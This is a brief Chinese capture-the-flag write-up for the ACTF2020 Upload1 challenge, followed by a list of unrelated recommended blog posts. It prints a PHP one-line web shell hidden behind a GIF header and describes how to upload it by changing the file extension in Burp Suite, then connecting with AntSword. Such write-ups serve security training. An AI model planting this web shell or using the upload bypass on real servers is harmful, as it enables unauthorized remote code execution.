1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
诸神黄昏EX1 小时前
Android 分区相关介绍大白要努力!2 小时前
android 使用SQLiteOpenHelper 如何优化数据库的性能Estar.Lee2 小时前
时间操作[取当前北京时间]免费API接口教程Winston Wood3 小时前
Perfetto学习大全Dnelic-5 小时前
【单元测试】【Android】JUnit 4 和 JUnit 5 的差异记录Eastsea.Chen8 小时前
MTK Android12 user版本MtkLogger长亭外的少年15 小时前
Kotlin 编译失败问题及解决方案:从守护进程到 Gradle 配置建群新人小猿18 小时前
会员等级经验问题1024小神19 小时前
tauri2.0版本开发苹果ios和安卓android应用,环境搭建和最后编译为apk兰琛19 小时前
20241121 android中树结构列表(使用recyclerView实现)